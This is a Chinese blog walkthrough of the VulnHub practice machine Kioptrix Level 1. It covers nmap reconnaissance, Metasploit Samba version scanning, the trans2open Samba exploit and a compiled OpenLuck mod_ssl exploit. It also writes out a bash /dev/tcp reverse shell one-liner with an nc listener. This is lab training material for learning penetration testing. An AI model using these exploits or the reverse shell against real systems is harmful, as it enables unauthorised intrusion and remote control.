前言
KIOPTRIX: LEVEL 1 是VulnHub发布的一个WEB靶场,难易程度:易。
靶场下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
打靶记录
信息收集
先使用nmap收集目标的ip地址,可以发现存活的靶机所使用的IP。
nmap -sP 192.168.101.0/24![图片[1] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-6.png)
扫描目标靶机开放端口,结果如图所示。
nmap -A -p- 192.168.101.20![图片[2] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-7.png)
这时我们发现服务器的139端口开放,是samba服务。我们使用msf框架探测一下samba服务的版本,使用的模块是:auxiliary/scanner/smb/smb_version
msfconsole
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options ![图片[3] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-30-1024x157.png)
设置一下模块的参数,rhosts为目标主机,然后输入run运行这个模块。可以发现Samba的版本为 2.2.1a,这是一个存在漏洞的samba版本!
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.101.20
rhosts => 192.168.101.20
msf6 auxiliary(scanner/smb/smb_version) > run![图片[4] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-31-1024x169.png)
漏洞利用
samba漏洞利用
利用msf框架对这个samba漏洞进行利用,使用msf搜索samba,使用 exploit/linux/samba/trans2open 这个模块,注意一下这个模块可以使用的版本为Samba 2.2.x - Bruteforce
![图片[5] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-27-1024x290.png)
![图片[6] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-28-1024x434.png)
设置一下相关参数:payload、rhosts (目标主机),然后直接运行模块,可以发现运行成功RCE了,输入任意命令即可发现命令被执行。
![图片[7] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-29-1024x473.png)
![图片[8] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-32-1024x235.png)
mod_ssl缓冲区溢出
从nmap探测结果我们发现了几个地方,除了Samba之外,目标主机的apache服务(443端口),使用了OpenSSL的0.9版本,使用的内核模块为mod_ssl/2.8.4,这个模块的早期漏洞较多,我们也可以尝试进行利用
![图片[9] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-33-1024x263.png)
为了防止修改代码麻烦,直接将利用脚本从github上下载下来,脚本地址:https://github.com/heltonWernik/OpenLuck
![图片[10] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-14.png)
然后运行这个脚本需要装一个libssl-dev的依赖:apt-get install libssl-dev
![图片[11] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-15.png)
对利用漏洞的源码进行编译
![图片[12] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-16.png)
编译完成之后会出现一个绿色的可执行文件,然后我们执行一下,可以发现部分提示信息,根据提示信息执行脚本即可
![图片[13] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-17.png)
利用编译好的文件,成功反弹回shell,执行命令:whoami,查看当前用户为apache
![图片[14] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-18.png)
权限获取
利用Samba打回来的shell直接是root权限,我们只需要反弹个shell即可,首先kali(监听机)监听端口:nc -lvvp 1234,然后在samba利用脚本的界面执行反射shell命令:bash -i >& /dev/tcp/<监听机IP>/1234 0>&1
![图片[15] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-19.png)
![图片[16] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-20.png)
暂无评论内容